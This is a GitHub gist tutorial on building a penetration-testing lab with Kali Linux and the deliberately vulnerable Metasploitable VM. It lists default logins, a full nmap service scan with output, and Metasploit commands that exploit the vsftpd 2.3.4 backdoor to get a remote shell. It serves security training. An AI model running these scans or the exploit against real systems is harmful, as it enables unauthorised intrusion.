Skip to content

Instantly share code, notes, and snippets.

@apolloclark

apolloclark/Kali Linux 2016.2 - Metasploitable Tutorial.md

Last active March 9, 2022 20:50
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 6 You must be signed in to fork a gist
  • Save apolloclark/78687df9a04aaf23aa3cd59415530694 to your computer and use it in GitHub Desktop.
Save apolloclark/78687df9a04aaf23aa3cd59415530694 to your computer and use it in GitHub Desktop.
Download ZIP
Kali Linux 2016.2 - Metasploitable Tutorial
Raw
Kali Linux 2016.2 - Metasploitable Tutorial.md

Metasploitable Tutorial

https://www.kali.org/downloads/
https://sourceforge.net/projects/metasploitable/
https://community.rapid7.com/docs/DOC-1875

1. create "Host-only Adapter"

# https://www.virtualbox.org/manual/ch06.html
NAT (internet)
NAT Network (VM to VM, internet)
Bridged Adapter (VM uses Host adapter)
Internal Network (VM to VM)
Host-only Adapter (VM to VM, uses software Host adapter)

2. import Metasploitable vmdk, configure Networking

3. import Kali ova, configure Networking

4. login to Kali Linux

username	root
password	toor

5. login to Metasploitable

username	msfadmin
password	msfadmin

6. determine the IP addresses of the machines

ifconfig # run this in both systems
192.168.56.101	Kali
192.168.56.102	Metasploitable

7. verify networking is setup

ping Kali -> Metasploitable
ping Metasploitable -> Kali

8. verify running services in Metasploitable

# Metasploitable
sudo netstat -tunlp | less

9. port scan Metasploitable

# Kali Linux
nmap -p0-65535 <metasploitable_ip>
nmap -sV -p0-65535 <metasploitable_ip>

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login
514/tcp   open  shell       Netkit rshd
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
6697/tcp  open  irc         Unreal ircd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34929/tcp open  mountd      1-3 (RPC #100005)
47746/tcp open  unknown
49161/tcp open  status      1 (RPC #100024)
57689/tcp open  nlockmgr    1-4 (RPC #100021)

10. configure Metasploitable

# startup Metasploit within Kali Linux, click the icon in the left-side dock
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show payloads
set payload cmd/unix/interact
show options
set RHOST <metasploitable_ip>
set RPORT 21
exploit
@dhtzl
Copy link

dhtzl commented May 17, 2019

nice

@andreslargo
Copy link

Awesome, thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment